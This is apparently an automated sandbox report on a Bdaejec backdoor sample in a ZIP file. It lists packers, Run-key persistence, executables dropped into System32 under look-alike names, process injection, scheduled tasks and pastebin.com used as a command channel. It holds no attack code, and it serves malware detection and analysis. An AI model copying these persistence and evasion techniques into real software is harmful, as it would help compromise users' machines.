Analysis Overview
SHA256
d6c2f953a4c4b2f7bf58378855bbc3d38c1b4d686118ad899540e5778413788d
Threat Level: Known bad
The file tmpfile-main.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Bdaejec family
Detects Bdaejec Backdoor.
Bdaejec
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Sets service image path in registry
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
Checks BIOS information in registry
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Themida packer
ASPack v2.12-2.42
VMProtect packed file
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Program crash
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Checks processor information in registry
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-02 16:10
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral7
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
158s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3516 wrote to memory of 3848 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3516 wrote to memory of 3848 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3516 wrote to memory of 3848 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\GasMask.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\GasMask.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
158s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1704 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\$Node32.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node2Json.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node3Json.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node2Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\System32\$Node3Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node32.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File created | C:\Windows\System32\$Node2Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node3Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\$Node32.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1704 set thread context of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\System32\$Node32.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DFC104D" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733155995" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={96D533AC-157F-4C60-9416-4DFFA36B90DD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DFC104D" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 02 Dec 2024 16:13:18 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000079608f3fe9600b47995dccb833195b77000000000200000000001066000000010000200000004b808c6f93a0a9e82ca0d87f48f7132b15a1891cc8da7b4606926c70d5bad11a000000000e80000000020000200000007ee7ec795c23ebada55b29b931af9b61fe895cbcb8d57d1d1ce9246c2a1a8ec9b0030000aa377babee90ec6bd21215c40fc14da95b1bf260db3a2e5d06d135c1af9f172d2b3b09c7a576317e7eb648bba2b988064f37ac77e78131e4d6316a9b45f620a8822dcd0cf295425f53d0cb5b4341b6bde9293ff617e823c21c2b160e9c6dfd51753f6b18421ce67bf960eb00b080d0826dbe1a0341b343250628319141507549fa213224ffe5b2470d6e64d8caad6df28b75f802e3c0cfc609f85a0ab651a8c711fa54781f9214a5519a23bf4f27bbd04e26d70177915a3ab19d77e6f33d14188534b78f2d8442f6eceec00951f70d84c7c242342c7c9c6de5cbf37da0a8cc6bba9d6a6a3cdc764d12be7b644395c0e6daef73f880f92a85a0d53db95ad9b5e35049d23104c3cbf559b3cdf266098e8bcade3a3bbc3eb337162cc630c49e05dbd10045a0dba152e202e1f7b3267193aa8b69c5133694d6b3bc68532b9c406a4affbded646c71aa48360cb343681e1bf9e6811ea21c08c895e62aab9a406ca0efb2e3ac3ccdc280e1c66a738d6159d405536d2c91cdcd37b272a097998d6a45ed0b7be5aa6aa4a52d0a31a82153fc201fc9a535ca15055b39102f45e1cb3ba6d31e498d54e757125a24a20c6aed729fbf64267569467f100b56a696c6ce1c3fc4d2c8a4028a90c15e5b443c15264a0aac1c1d0f7cb02dae77526b1c0a69a7ccd2f3787ede6aca3b1ff307d6b4eeb74b3241bdc4c758a66ace28922078e8baaf714197818129b6c9adddf92114314ac2f5a829462e7e6de8fdd9f9e5b8ca2c7dd314f2064a6017f2dca35283a18246bf093e01edf58ff90e452905e15704306c3402f0f1c0d79a5a78cbce8ab064268f4d0adc946d2d1996c6358e8a3d32d15c234cecf89938ecf076701abe383951f7d64c782a86738b77111f3f883008ea8e987e4ef5501e18a37986f8c644fbf000dfc3c9f382df9fa8f38837f1fac4adb9bbc092e2e6d88b426c7bf3a070cdfc6e6733fc189aa073e322631bd26b2ed18b73f4f4a4229dd91d3c70efe1c33f22b0481ee1621084286cc9a4aa96d6afa0a2133cbeb003763d16cd7dc8a36346090b8a46771322ae89461de79bcaaaf468c32baeb92137dbb3eed18887bcfa8345c617aacba2b33d586f3da9ed89c9274b8908e0161d260f8a151634367cc54326b54fd5ebd408d532507175fc653ed48df0b3e07dff5b0648efcfe1cf2f01c08a4e61c1e0624b1fe7a4310af33acdabdb2d0e0adc5b1c36a9d87c232e4884f64249e167ac476682d5d52397b2a06c461d9636c87e9286fc2cf3f1f1bb9ad45d7d275f62ca573d21c7fe049fa5b16858ded5a390fb85cad7594a58a7917acf431b7bf6400000009b2ad73007e299b80abe49fa987c745dcf11bb8392100ecd31a59b2697f0db83835210a646e99b6fce6e42fb9b2fe1295b4138e280efb729d0ef6d84baefd62b | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
